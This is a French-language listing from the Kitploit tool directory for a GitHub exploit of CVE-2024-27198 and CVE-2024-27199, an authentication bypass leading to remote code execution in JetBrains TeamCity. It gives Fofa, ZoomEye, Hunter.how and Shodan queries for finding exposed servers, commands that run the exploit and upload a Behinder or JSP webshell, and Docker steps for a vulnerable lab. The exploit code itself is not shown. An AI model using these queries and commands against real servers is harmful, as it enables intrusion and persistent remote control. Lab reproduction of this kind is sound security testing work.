Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-27198-RCE — CVE-2024-27198 & CVE-2024-27199 Contournement d'authentification --> RCE dans JetBrains TeamCity Pre-2023.11.4 | Kitploit
Outils/GitHubGitHub/w01fh4cker/cve-2024-27198-rce
Authentification et AutorisationAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionRed Teaming
GitHubw01fh4cker/cve-2024-27198-rce

CVE-2024-27198-RCE

CVE-2024-27198 & CVE-2024-27199 Contournement d'authentification --> RCE dans JetBrains TeamCity Pre-2023.11.4

Voir le dépôt
157364il y a 2 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Dork de cartographie du cyberespace

Fofa

root@kitploit:~
app="JET_BRAINS-TeamCity"

ZoomEye

root@kitploit:~
app:"JetBrains TeamCity"

Hunter.how

root@kitploit:~
product.name="TeamCity"

Shodan

root@kitploit:~
http.component:"teamcity"

Comment utiliser

J'utilise Python3.9.

root@kitploit:~
pip install requests urllib3 faker
python CVE-2024-27198-RCE.py -t http://192.168.198.173:8111 --behinder4
# python CVE-2024-27198-RCE.py -t http://192.168.198.173:8111 -f shell.jsp

Aussi :

root@kitploit:~
python CVE-2024-27198-RCE.py -t http://192.168.198.173:8111

Construction de l'environnement de reproduction de la vulnérabilité

Utilisez docker pour récupérer l'image vulnérable et la lancer :

root@kitploit:~
sudo docker pull jetbrains/teamcity-server:2023.11.3
sudo docker run -it -d --name teamcity -u root -p 8111:8111 jetbrains/teamcity-server:2023.11.3
# sudo ufw disable

Ensuite, effectuez les réglages de base :

Références

https://www.rapid7.com/blog/post/2024/03/04/etr-cve-2024-27198-and-cve-2024-27199-jetbrains-teamcity-multiple-authentication-bypass-vulnerabilities-fixed/

https://github.com/Chocapikk/CVE-2024-27198

Télécharger l’outil